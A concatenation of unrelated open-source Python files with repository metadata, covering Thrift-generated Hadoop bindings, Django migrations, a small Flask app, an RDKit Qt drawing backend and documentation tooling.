    (0, TType.STRUCT, 'success', (hadoop.api.common.ttypes.ThriftDelegationToken, hadoop.api.common.ttypes.ThriftDelegationToken.thrift_spec), None, ), # 0
    (1, TType.STRUCT, 'err', (hadoop.api.common.ttypes.IOException, hadoop.api.common.ttypes.IOException.thrift_spec), None, ), # 1
  )

  def __init__(self, success=None, err=None,):
    self.success = success
    self.err = err

  def read(self, iprot):
    # C-accelerated decode fast path when protocol/transport support it.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 0:
        if ftype == TType.STRUCT:
          self.success = hadoop.api.common.ttypes.ThriftDelegationToken()
          self.success.read(iprot)
        else:
          iprot.skip(ftype)
      elif fid == 1:
        if ftype == TType.STRUCT:
          self.err = hadoop.api.common.ttypes.IOException()
          self.err.read(iprot)
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    # C-accelerated encode fast path.
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('getDelegationToken_result')
    if self.success is not None:
      oprot.writeFieldBegin('success', TType.STRUCT, 0)
      self.success.write(oprot)
      oprot.writeFieldEnd()
    if self.err is not None:
      oprot.writeFieldBegin('err', TType.STRUCT, 1)
      self.err.write(oprot)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    # No required fields to check.
    return

  def __repr__(self):
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)
|
{
"content_hash": "a55c2860d01c40f05890245b054f2736",
"timestamp": "",
"source": "github",
"line_count": 5052,
"max_line_length": 188,
"avg_line_length": 30.759303246239114,
"alnum_prop": 0.6337357460938505,
"repo_name": "hortonworks/hortonworks-sandbox",
"id": "a0857587d263dfef53eafdc2ef0e7d17868bd31e",
"size": "155513",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "desktop/libs/hadoop/gen-py/hadoop/api/hdfs/Namenode.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "ActionScript",
"bytes": "27264"
},
{
"name": "Assembly",
"bytes": "207947"
},
{
"name": "C",
"bytes": "10279874"
},
{
"name": "C++",
"bytes": "208068"
},
{
"name": "CSS",
"bytes": "356769"
},
{
"name": "Emacs Lisp",
"bytes": "3171"
},
{
"name": "Java",
"bytes": "3064179"
},
{
"name": "JavaScript",
"bytes": "1532806"
},
{
"name": "PHP",
"bytes": "4160"
},
{
"name": "Perl",
"bytes": "139518"
},
{
"name": "Python",
"bytes": "27735073"
},
{
"name": "R",
"bytes": "12290"
},
{
"name": "Ruby",
"bytes": "5050"
},
{
"name": "Shell",
"bytes": "42062"
},
{
"name": "XSLT",
"bytes": "585"
}
],
"symlink_target": ""
}
|
from tempfile import gettempdir, mkstemp
from json import dump, load
class ParseSyncConfig(object):
    """JSON-backed store of per-model sync watermarks.

    Persists, in a file under the system temp directory, the date of the
    last item pulled from Parse for each model, keyed by
    '<module>.<class name>'. Call save() to flush changes to disk.
    """

    # Config lives in the temp dir so it survives a process restart but
    # not necessarily a reboot.
    CONFIG_PATH = '%s/parsesync.config' % gettempdir()

    def __init__(self):
        # A missing, unreadable or corrupt config file falls back to an
        # empty store. Only file and JSON errors are swallowed (the
        # previous bare `except Exception` hid genuine bugs as well);
        # json.load raises ValueError on malformed input.
        try:
            with open(self.CONFIG_PATH, 'r') as f:
                self.config = load(f)
        except (IOError, OSError, ValueError):
            self.config = {'from_parse': {}}
        else:
            # Guard against a file written by a foreign/older tool:
            # the store must be a dict containing the 'from_parse' map.
            if not isinstance(self.config, dict):
                self.config = {}
            self.config.setdefault('from_parse', {})

    def get_last_updated_item_from_parse(self, model):
        """Return the stored watermark for *model*, or None if unknown."""
        key = self._get_key_from_model(model)
        return self.config['from_parse'].get(key)

    def set_last_updated_item_from_parse(self, model, date):
        """Record *date* as the latest item pulled from Parse for *model*."""
        key = self._get_key_from_model(model)
        self.config['from_parse'][key] = date

    def _get_key_from_model(self, model):
        # Fully-qualified class name keeps same-named models in different
        # apps/modules from colliding.
        return '%s.%s' % (model.__module__, model.__name__)

    def save(self):
        """Write the current store back to CONFIG_PATH as JSON."""
        with open(self.CONFIG_PATH, 'w') as f:
            dump(self.config, f)
|
{
"content_hash": "62bf6ba568c8139acccd436d2019473c",
"timestamp": "",
"source": "github",
"line_count": 28,
"max_line_length": 60,
"avg_line_length": 30.785714285714285,
"alnum_prop": 0.5835266821345708,
"repo_name": "cereigido/django-parse-sync",
"id": "754c518040567cc3bc4770eab490f81bfecad9ef",
"size": "886",
"binary": false,
"copies": "2",
"ref": "refs/heads/develop",
"path": "parsesync/config.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Makefile",
"bytes": "498"
},
{
"name": "Python",
"bytes": "20293"
}
],
"symlink_target": ""
}
|
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated migration: make ``company`` optional on Employee and Person."""

    dependencies = [
        ('crm', '0002_auto_20161126_0030'),
    ]

    operations = [
        # Same field definition on both models: optional CharField
        # (blank + null) labelled 'empresa'.
        migrations.AlterField(
            model_name='employee',
            name='company',
            field=models.CharField(blank=True, max_length=50, null=True, verbose_name='empresa'),
        ),
        migrations.AlterField(
            model_name='person',
            name='company',
            field=models.CharField(blank=True, max_length=50, null=True, verbose_name='empresa'),
        ),
    ]
|
{
"content_hash": "3fa05873e0c7a2c22da15390c21dc100",
"timestamp": "",
"source": "github",
"line_count": 23,
"max_line_length": 97,
"avg_line_length": 27.17391304347826,
"alnum_prop": 0.5904,
"repo_name": "rg3915/orcamentos",
"id": "9f14ca6585186335a6ae1ef43eb3f085844b50bb",
"size": "697",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "orcamentos/crm/migrations/0003_auto_20161126_0032.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "50664"
},
{
"name": "HTML",
"bytes": "542962"
},
{
"name": "JavaScript",
"bytes": "133637"
},
{
"name": "Jupyter Notebook",
"bytes": "134102"
},
{
"name": "Makefile",
"bytes": "1730"
},
{
"name": "Python",
"bytes": "197204"
},
{
"name": "Shell",
"bytes": "10278"
}
],
"symlink_target": ""
}
|
import os
from flask import Flask, url_for, render_template, request
app = Flask(__name__)
@app.route('/')
def renderMain():
    """Serve the home page."""
    return render_template('home.html')


@app.route('/page1')
def renderPage1():
    """Serve static page 1."""
    return render_template('page1.html')


@app.route('/page2')
def renderPage2():
    """Serve static page 2."""
    return render_template('page2.html')


@app.route('/page3')
def renderPage3():
    """Serve static page 3."""
    return render_template('page3.html')


@app.route('/page4')
def renderPage4():
    """Serve static page 4."""
    return render_template('page4.html')
@app.route('/ftoc')
def renderResult():
    """Convert the 'fTemp' query parameter from Fahrenheit to Celsius.

    Renders celsiusResult.html with both temperatures, or a plain error
    string if the parameter is missing or not a number.
    """
    try:
        # print() function form keeps this debug line Python-3 compatible
        # (the original Python-2 print statement is a SyntaxError on Py3).
        print("request.args['fTemp']", request.args['fTemp'])
        ftemp = float(request.args['fTemp'])
        ctemp = ftoc(ftemp)
        return render_template('celsiusResult.html', fTemp=ftemp, cTemp=ctemp)
    except (ValueError, KeyError):
        # ValueError: non-numeric input; KeyError: 'fTemp' absent entirely
        # (the original only caught ValueError, so a missing param crashed).
        return "Sorry: something went wrong."
def ftoc(ftemp):
    """Convert degrees Fahrenheit to degrees Celsius."""
    celsius = (ftemp - 32.0) * (5.0 / 9.0)
    return celsius
if __name__=="__main__":
    # Listen on all interfaces on port 54321; debug mode disabled.
    app.run(debug=False,host="0.0.0.0",port=54321)
|
{
"content_hash": "b958905b51954da5ca1edcd9b79b676c",
"timestamp": "",
"source": "github",
"line_count": 42,
"max_line_length": 78,
"avg_line_length": 22.857142857142858,
"alnum_prop": 0.6479166666666667,
"repo_name": "pconrad/flask-practice-web-app",
"id": "d15d3ce8c2cef8b091cf29c7556867f4eba6dec0",
"size": "960",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "hello.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "426"
},
{
"name": "HTML",
"bytes": "2888"
},
{
"name": "Python",
"bytes": "960"
}
],
"symlink_target": ""
}
|
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated initial migration: creates the Person model."""

    initial = True

    dependencies = [
    ]

    operations = [
        migrations.CreateModel(
            name='Person',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                # Choice labels are Polish ('man'/'woman'); stored values are English keys.
                ('sex', models.CharField(choices=[('men', 'mężczyzna'), ('women', 'kobieta')], max_length=20)),
                ('weight', models.FloatField()),
                ('height', models.FloatField()),
            ],
        ),
    ]
|
{
"content_hash": "7b38be4e775894ce00ae70629e5f5290",
"timestamp": "",
"source": "github",
"line_count": 23,
"max_line_length": 114,
"avg_line_length": 27.304347826086957,
"alnum_prop": 0.5493630573248408,
"repo_name": "PyLadiesPoznanAdvanced/django-introduction-bmi",
"id": "e3d114a090e8043390800bad37c0fdde4c12f39c",
"size": "702",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "calculators/migrations/0001_initial.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "369"
},
{
"name": "HTML",
"bytes": "3007"
},
{
"name": "Python",
"bytes": "11222"
}
],
"symlink_target": ""
}
|
from __future__ import (nested_scopes, generators, division, absolute_import, with_statement,
print_function, unicode_literals)
import unittest2 as unittest
from pants.goal.task_registrar import TaskRegistrar
from pants.goal.goal import Goal
class EngineTestBase(unittest.TestCase):
  """Test base that clears the global ``Goal`` registry around each test."""

  @classmethod
  def as_goal(cls, goal_name):
    """Returns a ``Goal`` object of the given name."""
    return Goal.by_name(goal_name)

  @classmethod
  def as_goals(cls, *goal_names):
    """Converts the given goal names to a list of ``Goal`` objects."""
    # List comprehension (not map) so a real list is returned as documented;
    # on Python 3 map() would yield a lazy iterator.
    return [cls.as_goal(goal_name) for goal_name in goal_names]

  @classmethod
  def install_task(cls, name, action=None, dependencies=None, goal=None):
    """Creates and installs a task with the given name.

    :param string name: The task name.
    :param action: The task's action.
    :param list dependencies: The list of goal names the task depends on, if any.
    :param string goal: The name of the goal to install the task in, if different from the task
      name.
    :returns The installed ``TaskRegistrar`` object.
    """
    registrar = TaskRegistrar(name, action=action or (lambda: None),
                              dependencies=dependencies or [])
    # install(None) falls back to the task name, so passing goal straight
    # through is equivalent to the old `goal if goal is not None else None`.
    registrar.install(goal)
    # Actually return the registrar, as the docstring has always promised.
    return registrar

  def setUp(self):
    super(EngineTestBase, self).setUp()
    # TODO(John Sirois): Now that the BuildFileParser controls goal registration by iterating
    # over plugin callbacks a GoalRegistry can be constructed by it and handed to all these
    # callbacks in place of having a global Goal registry. Remove the Goal static cling.
    Goal.clear()

  def tearDown(self):
    Goal.clear()
    super(EngineTestBase, self).tearDown()
|
{
"content_hash": "d943e6a36116f1485fd127dc4e3045a8",
"timestamp": "",
"source": "github",
"line_count": 47,
"max_line_length": 95,
"avg_line_length": 35.97872340425532,
"alnum_prop": 0.6924896510940272,
"repo_name": "square/pants",
"id": "c53101ef6a0c5d2b0559e21861796ad6de7330dd",
"size": "1838",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "tests/python/pants_test/engine/base_engine_test.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "AGS Script",
"bytes": "273"
},
{
"name": "CSS",
"bytes": "9347"
},
{
"name": "GAP",
"bytes": "4684"
},
{
"name": "Java",
"bytes": "46389"
},
{
"name": "JavaScript",
"bytes": "9523"
},
{
"name": "Python",
"bytes": "2250380"
},
{
"name": "Scala",
"bytes": "5517"
},
{
"name": "Shell",
"bytes": "29381"
},
{
"name": "Thrift",
"bytes": "1674"
}
],
"symlink_target": ""
}
|
"""piddleQt
This module implements the PIDDLE/Sping API for a Qt canvas
Bits have been shamelessly cobbled from piddleSVG.py
Greg Landrum (Landrum@RationalDiscovery.com) 29 October, 2002
"""
"""
Functionality implemented:
x drawLine
x drawPolygon
x drawString
x drawImage
Known problems:
"""
from rdkit.sping import pid
from qt import *
from qtcanvas import *
from math import *
import copy
def _ColorToQt(color):
  """ convenience function for converting a sping.pid color to a Qt color
  """
  if color == pid.transparent:
    return None
  # Scale each 0..1 channel up to the 0..255 byte range Qt expects.
  channels = [int(c * 255) for c in (color.red, color.green, color.blue)]
  return QColor(*channels)
class QCanvasRotText(QCanvasText):
  """ used to draw (UGLY) rotated text
  """

  def __init__(self, txt, canvas, angle=0):
    QCanvasText.__init__(self, txt, canvas)
    # rotation angle in degrees
    self._angle = angle

  def draw(self, qP):
    # Rotate the painter's coordinate system, then translate so the rotated
    # text still lands at its original (x, y) anchor point.
    qP.save()
    x = self.x()
    y = self.y()
    theta = -self._angle
    qP.rotate(theta)
    qP.translate(-x, -y)
    thetaR = theta * pi / 180.
    # Position of the anchor expressed in the rotated coordinate frame.
    newX = cos(-thetaR) * x - sin(-thetaR) * y
    newY = sin(-thetaR) * x + cos(-thetaR) * y
    qP.translate(newX, newY)
    QCanvasText.draw(self, qP)
    qP.restore()
class QtCanvas(pid.Canvas):
def __init__(self, destCanvas, size=(300, 300), name='QtCanvas'):
    """Wrap an existing QCanvas ``destCanvas`` as a sping/PIDDLE drawing surface."""
    self.size = size
    pid.Canvas.__init__(self, size, name)
    self._canvas = destCanvas
    # Shared brush/pen/font objects, re-configured before each draw call.
    self._brush = QBrush()
    self._pen = QPen()
    #self._font = QFont()
    self._font = QApplication.font()
    # Canvas items we created (tuples for images); nObjs doubles as z-order.
    self.objs = []
    self._initOutput()
    self.nObjs = 0
def _initOutput(self):
    """Hide every canvas item created so far and reset the item bookkeeping."""
    for obj in self.objs:
        # drawImage() appends (sprite, pixmap, ...) tuples; only the first
        # element is a canvas item that can be hidden.
        target = obj[0] if isinstance(obj, tuple) else obj
        target.hide()
    self.objs = []
    self.nObjs = 0
def _adjustFont(self, font):
    """Copy a sping font spec onto the shared QFont ``self._font``."""
    # An empty/None face keeps the current family.
    if font.face:
        self._font.setFamily(font.face)
    self._font.setBold(font.bold)
    self._font.setItalic(font.italic)
    self._font.setPointSize(font.size)
    self._font.setUnderline(font.underline)
# public functions
def clear(self):
    """Remove everything drawn so far."""
    self._initOutput()

def flush(self):
    """Push pending drawing to the screen."""
    self._canvas.update()

def save(self, file=None, format=None):
    """No file output here; just refreshes the canvas (args kept for API parity)."""
    self._canvas.update()

#------------- drawing methods --------------
def drawLine(self, x1, y1, x2, y2, color=None, width=None, dash=None, **kwargs):
    "Draw a straight line between x1,y1 and x2,y2."
    # set color... explicit transparent, or transparent default with no
    # explicit color, means "draw nothing".
    if color:
        if color == pid.transparent:
            return
    elif self.defaultLineColor == pid.transparent:
        return
    else:
        color = self.defaultLineColor
    qColor = _ColorToQt(color)
    if width:
        w = width
    else:
        w = self.defaultLineWidth
    self._pen.setColor(qColor)
    self._pen.setWidth(int(w))
    if dash is not None:
        self._pen.setStyle(Qt.DashLine)
    else:
        self._pen.setStyle(Qt.SolidLine)
    l = QCanvasLine(self._canvas)
    l.setPen(self._pen)
    l.setPoints(x1, y1, x2, y2)
    l.setVisible(1)
    # nObjs doubles as the z-order so later items draw on top.
    l.setZ(self.nObjs)
    # Restore the shared pen to solid for subsequent draw calls.
    if dash is not None:
        self._pen.setStyle(Qt.SolidLine)
    self.nObjs += 1
    self.objs.append(l)
def drawPolygon(self, pointlist, edgeColor=None, edgeWidth=None, fillColor=pid.transparent,
                closed=0, dash=None, **kwargs):
    """drawPolygon(pointlist) -- draws a polygon
    pointlist: a list of (x,y) tuples defining vertices
    """
    # Flatten [(x, y), ...] into [x, y, x, y, ...] for QPointArray.
    pts = []
    for point in pointlist:
        pts += list(point)
    ptArr = QPointArray()
    ptArr.setPoints(pts)
    # set color for fill...
    filling = 0
    if fillColor:
        if fillColor != pid.transparent:
            filling = 1
            qColor = _ColorToQt(fillColor)
            self._brush.setColor(qColor)
    if filling:
        self._brush.setStyle(Qt.SolidPattern)
    else:
        self._brush.setStyle(Qt.NoBrush)
    # set color for edge...
    if not edgeColor:
        edgeColor = self.defaultLineColor
    qColor = _ColorToQt(edgeColor)
    if qColor:
        self._pen.setColor(qColor)
    # set edge width...
    if edgeWidth is None:
        edgeWidth = self.defaultLineWidth
    self._pen.setWidth(edgeWidth)
    self._pen.setJoinStyle(Qt.RoundJoin)
    if dash is not None:
        self._pen.setStyle(Qt.DashLine)
    else:
        self._pen.setStyle(Qt.SolidLine)
    poly = QCanvasPolygon(self._canvas)
    poly.setPen(self._pen)
    poly.setBrush(self._brush)
    poly.setPoints(ptArr)
    poly.setVisible(1)
    poly.setZ(self.nObjs)
    self.nObjs += 1
    self.objs.append(poly)
    # qt is moronic and doesn't draw the outlines of polygons, so the edge is
    # drawn manually as individual line segments.
    if edgeColor != pid.transparent:
        for i in range(len(pointlist) - 1):
            l = QCanvasLine(self._canvas)
            l.setPoints(pointlist[i][0], pointlist[i][1], pointlist[i + 1][0], pointlist[i + 1][1])
            l.setPen(self._pen)
            l.setVisible(1)
            l.setZ(self.nObjs)
            self.objs.append(l)
        # Close the outline with a final segment back to the first vertex.
        if closed:
            l = QCanvasLine(self._canvas)
            l.setPoints(pointlist[0][0], pointlist[0][1], pointlist[-1][0], pointlist[-1][1])
            l.setPen(self._pen)
            l.setVisible(1)
            l.setZ(self.nObjs)
            self.objs.append(l)
    # Restore the shared pen to solid for subsequent draw calls.
    if dash is not None:
        self._pen.setStyle(Qt.SolidLine)
    self.nObjs += 1
def drawString(self, s, x, y, font=None, color=None, angle=0, **kwargs):
    """Draw string ``s`` at (x, y); nonzero ``angle`` rotates via QCanvasRotText."""
    # set color... transparent (explicit or via default) means draw nothing.
    if color:
        if color == pid.transparent:
            return
    elif self.defaultLineColor == pid.transparent:
        return
    else:
        color = self.defaultLineColor
    if font is None:
        font = self.defaultFont
    qColor = _ColorToQt(color)
    if font is not None:
        self._adjustFont(font)
    if angle != 0:
        txt = QCanvasRotText(s, self._canvas, angle=angle)
    else:
        txt = QCanvasText(s, self._canvas)
    txt.setTextFlags(Qt.AlignLeft | Qt.AlignVCenter)
    if self._font:
        txt.setFont(self._font)
    txt.setColor(qColor)
    txt.setVisible(1)
    txt.setX(x)
    # Shift up by the font size so (x, y) behaves as a baseline anchor.
    y -= font.size
    txt.setY(y)
    txt.setZ(self.nObjs)
    self.nObjs += 1
    self.objs.append(txt)
def drawImage(self, image, x1, y1, x2=None, y2=None, **kwargs):
    """Draw a PIL-style ``image`` with its top-left corner at (x1, y1).

    ``x2``/``y2`` are accepted for sping API compatibility but ignored
    (no scaling is performed).
    """
    from io import BytesIO
    # PNG data is binary: it must be buffered in a BytesIO. The original
    # used io.StringIO, which raises TypeError when bytes are written to it.
    bio = BytesIO()
    image.save(bio, format='png')
    base = QPixmap()
    base.loadFromData(bio.getvalue())
    pm = QCanvasPixmap(base, QPoint(0, 0))
    pma = QCanvasPixmapArray()
    pma.setImage(0, pm)
    img = QCanvasSprite(pma, self._canvas)
    img.setVisible(1)
    img.setX(x1)
    img.setY(y1)
    # Keep base/pm/pma alive alongside the sprite so Qt doesn't lose them.
    self.objs.append((img, base, pm, pma))
def stringWidth(self, s, font=None):
    """Return the logical width of ``s`` if it were drawn in ``font``
    (defaults to self.defaultFont)."""
    if not font:
        font = self.defaultFont
    if font:
        self._adjustFont(font)
    # Measure via a throwaway canvas text item's bounding rectangle.
    t = QCanvasText(s, self._canvas)
    t.setFont(self._font)
    rect = t.boundingRect()
    return rect.width()
def fontAscent(self, font=None):
    """Approximate the ascent of ``font`` from a capital letter's bounding box."""
    if not font:
        font = self.defaultFont
    if font:
        self._adjustFont(font)
    t = QCanvasText('B', self._canvas)
    t.setFont(self._font)
    rect = t.boundingRect()
    # FIX: this is a hack, but I can't immediately figure out how to solve the
    # problem that the bounding rectangle includes the descent:
    return 1.0 * rect.height()
def fontDescent(self, font=None):
    """Approximate the descent as the extra height of 'y' over 'B'."""
    if not font:
        font = self.defaultFont
    if font:
        self._adjustFont(font)
    t = QCanvasText('B', self._canvas)
    t.setFont(self._font)
    rect1 = t.boundingRect()
    # 'y' has a descender, 'B' does not; their height difference is the descent.
    t = QCanvasText('y', self._canvas)
    t.setFont(self._font)
    rect2 = t.boundingRect()
    return 1. * (rect2.height() - rect1.height())
def test(canvas):
    """Smoke-test the basic drawing API.

    NOTE(review): relies on names (Color, black, red, Font, ...) star-imported
    from rdkit.sping.pid at module level in the __main__ block; it is not
    callable standalone.
    """
    #... for testing...
    canvas.defaultLineColor = Color(0.7, 0.7, 1.0) # light blue
    canvas.drawLines(map(lambda i: (i * 10, 0, i * 10, 300), range(30)))
    canvas.drawLines(map(lambda i: (0, i * 10, 300, i * 10), range(30)))
    canvas.defaultLineColor = black
    canvas.drawLine(10, 200, 20, 190, color=red)
    canvas.drawEllipse(130, 30, 200, 100, fillColor=yellow, edgeWidth=4)
    canvas.drawArc(130, 30, 200, 100, 45, 50, fillColor=blue, edgeColor=navy, edgeWidth=4)
    canvas.defaultLineWidth = 4
    canvas.drawRoundRect(30, 30, 100, 100, fillColor=blue, edgeColor=maroon)
    canvas.drawCurve(20, 20, 100, 50, 50, 100, 160, 160)
    #canvas.drawString("This is a test!", 30,130, Font(face="times",size=16,bold=1),
    #                  color=green, angle=-45)
    #canvas.drawString("This is a test!", 30,130, color=red, angle=-45)
    polypoints = [(160, 120), (130, 190), (210, 145), (110, 145), (190, 190)]
    canvas.drawPolygon(polypoints, fillColor=lime, edgeColor=red, edgeWidth=3, closed=1)
    canvas.drawRect(200, 200, 260, 260, edgeColor=yellow, edgeWidth=5)
    canvas.drawLine(200, 260, 260, 260, color=green, width=5)
    canvas.drawLine(260, 200, 260, 260, color=red, width=5)
    canvas.flush()
def dashtest(canvas):
    """Same smoke test as test() but exercising the dashed-line code paths.

    NOTE(review): like test(), depends on colors/Font star-imported from
    rdkit.sping.pid in the __main__ block; not callable standalone.
    """
    #... for testing...
    canvas.defaultLineColor = Color(0.7, 0.7, 1.0) # light blue
    canvas.drawLines(map(lambda i: (i * 10, 0, i * 10, 300), range(30)), dash=(3, 3))
    canvas.drawLines(map(lambda i: (0, i * 10, 300, i * 10), range(30)), dash=(3, 3))
    canvas.defaultLineColor = black
    canvas.drawLine(10, 200, 20, 190, color=red, dash=(3, 3))
    canvas.drawEllipse(130, 30, 200, 100, fillColor=yellow, edgeWidth=4, dash=(3, 3))
    canvas.drawArc(130, 30, 200, 100, 45, 50, fillColor=blue, edgeColor=navy, edgeWidth=4, dash=(3,
                                                                                                 3))
    canvas.defaultLineWidth = 4
    canvas.drawRoundRect(30, 30, 100, 100, fillColor=blue, edgeColor=maroon, dash=(3, 3))
    canvas.drawCurve(20, 20, 100, 50, 50, 100, 160, 160, dash=(3, 3))
    canvas.drawString("This is a test!", 30, 130, Font(face="times", size=16, bold=1), color=green,
                      angle=-45)
    canvas.drawString("This is a test!", 30, 130, color=red, angle=-45)
    polypoints = [(160, 120), (130, 190), (210, 145), (110, 145), (190, 190)]
    canvas.drawPolygon(polypoints, fillColor=lime, edgeColor=red, edgeWidth=3, closed=1, dash=(3, 3))
    canvas.drawRect(200, 200, 260, 260, edgeColor=yellow, edgeWidth=5, dash=(3, 3))
    canvas.drawLine(200, 260, 260, 260, color=green, width=5, dash=(3, 3))
    canvas.drawLine(260, 200, 260, 260, color=red, width=5, dash=(3, 3))
    canvas.flush()
if __name__ == '__main__':
    import sys
    # Star import supplies Color, Font and the named colors used by dashtest().
    from rdkit.sping.pid import *
    app = QApplication(sys.argv)
    w = QCanvasView()
    qCanv = QCanvas(300, 300)
    w.setCanvas(qCanv)
    canv = QtCanvas(qCanv)
    dashtest(canv)
    w.show()
    w.adjustSize()
    # Qt3-era API: setMainWidget/exec_loop instead of the modern exec().
    app.setMainWidget(w)
    app.exec_loop()
|
{
"content_hash": "1d73501af30dd1b1b0240948817ef182",
"timestamp": "",
"source": "github",
"line_count": 383,
"max_line_length": 99,
"avg_line_length": 27.407310704960835,
"alnum_prop": 0.6217014385062398,
"repo_name": "bp-kelley/rdkit",
"id": "c781bd82d0e119d2934839dadae747d31716a3d6",
"size": "11286",
"binary": false,
"copies": "8",
"ref": "refs/heads/master",
"path": "rdkit/sping/Qt/pidQt.py",
"mode": "33261",
"license": "bsd-3-clause",
"language": [
{
"name": "C",
"bytes": "1593408"
},
{
"name": "C#",
"bytes": "10167"
},
{
"name": "C++",
"bytes": "13831236"
},
{
"name": "CMake",
"bytes": "761688"
},
{
"name": "Dockerfile",
"bytes": "2590"
},
{
"name": "Fortran",
"bytes": "7590"
},
{
"name": "HTML",
"bytes": "43059702"
},
{
"name": "Java",
"bytes": "369342"
},
{
"name": "JavaScript",
"bytes": "52043"
},
{
"name": "Jupyter Notebook",
"bytes": "498341"
},
{
"name": "LLVM",
"bytes": "40048"
},
{
"name": "Lex",
"bytes": "4508"
},
{
"name": "Makefile",
"bytes": "10862"
},
{
"name": "Python",
"bytes": "4156873"
},
{
"name": "QMake",
"bytes": "389"
},
{
"name": "SMT",
"bytes": "3010"
},
{
"name": "SWIG",
"bytes": "342569"
},
{
"name": "Shell",
"bytes": "3822"
},
{
"name": "Smarty",
"bytes": "5864"
},
{
"name": "Yacc",
"bytes": "61432"
}
],
"symlink_target": ""
}
|
from iris_sdk.models.maps.base_map import BaseMap
class AvailableNpaNxxListMap(BaseMap):
    """Mapping class for the AvailableNpaNxxList response node."""
    # Placeholder; presumably filled in by BaseMap's parsing machinery --
    # confirm against iris_sdk.models.maps.base_map.BaseMap.
    available_npa_nxx = None
|
{
"content_hash": "82b9d1acdf2cb4b80b38a7ed1a4d103a",
"timestamp": "",
"source": "github",
"line_count": 5,
"max_line_length": 49,
"avg_line_length": 23.8,
"alnum_prop": 0.7899159663865546,
"repo_name": "scottbarstow/iris-python",
"id": "9e11eb16e434945c0b1e6b763e12351d421ac0a5",
"size": "142",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "iris_sdk/models/maps/available_npa_nxx_list.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "308732"
}
],
"symlink_target": ""
}
|
"""Generate parms pages."""
import os
import mkdocs_gen_files
# Repository root: three levels up from this file (doc/mkdocs/<this file>).
repo_base = os.path.abspath(
    os.path.join(
        os.path.abspath(__file__), os.path.pardir, os.path.pardir, os.path.pardir
    )
)
# Where the param modules live, and where the generated docs should go.
params_source = os.path.join(repo_base, "python", "federatedml", "param")
params_doc_target = os.path.join(repo_base, "doc", "federatedml_component", "params")
md_template = """\
# {name}
::: federatedml.param.{name}
options:
heading_level: 2
show_source: true
show_root_heading: true
show_root_toc_entry: false
show_root_full_path: false
"""
def create_params_doc():
    """Emit one markdown stub in ``params_doc_target`` per param module."""
    os.makedirs(params_doc_target, exist_ok=True)
    for file_name in os.listdir(params_source):
        # Only real Python modules; skip the package marker.
        if not file_name.endswith(".py") or file_name == "__init__.py":
            continue
        name = file_name[:-3]
        full_doc_path = os.path.join(params_doc_target, f"{name}.md")
        with mkdocs_gen_files.open(full_doc_path, "w") as fd:
            print(md_template.format(name=name), file=fd)
        mkdocs_gen_files.set_edit_path(full_doc_path, os.path.join(params_source, file_name))
|
{
"content_hash": "eb8156283df2a72070d4a1c103e9233a",
"timestamp": "",
"source": "github",
"line_count": 32,
"max_line_length": 97,
"avg_line_length": 34.53125,
"alnum_prop": 0.6271493212669683,
"repo_name": "FederatedAI/FATE",
"id": "355a255c6bdf288252086aa9407dcccbc098c2dd",
"size": "1105",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "doc/mkdocs/gen_params_doc.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Lua",
"bytes": "19716"
},
{
"name": "Python",
"bytes": "5121767"
},
{
"name": "Rust",
"bytes": "3971"
},
{
"name": "Shell",
"bytes": "19676"
}
],
"symlink_target": ""
}
|
"""Dialog package exports."""
from .logindialog import login
# NOTE(review): deliberately(?) re-exported under the builtin name 'exit'.
from .exitdialog import exit
from .msgdialog import MessageDialog
from .msgdialog import msg
from .ipaddressdialog import ipaddressinput
from .urlinputdialog import urlinput
from .numinputdialog import numinput
from .confirmdialog import confirm
from .confirmdialog import ConfirmDialog
from .basedialog import DynamicTextWidget
# from .weblogindialog import weblogin
from .settingsdialog import settingsinput

__version__ = '0.1.0'
# 'settingsinput' was imported above but missing from __all__, so star-imports
# silently dropped it; added for consistency with the other dialogs.
__all__ = ['DynamicTextWidget', 'ConfirmDialog', 'MessageDialog', 'login', 'exit', 'msg',
           'ipaddressinput', 'urlinput', 'numinput', 'confirm', 'settingsinput']
__author__ = 'dragondjf(dragondjf@gmail.com)'
|
{
"content_hash": "512d5269856438f1e67b6d640220bfbb",
"timestamp": "",
"source": "github",
"line_count": 18,
"max_line_length": 142,
"avg_line_length": 36.388888888888886,
"alnum_prop": 0.7877862595419848,
"repo_name": "dragondjf/CloudSetuper",
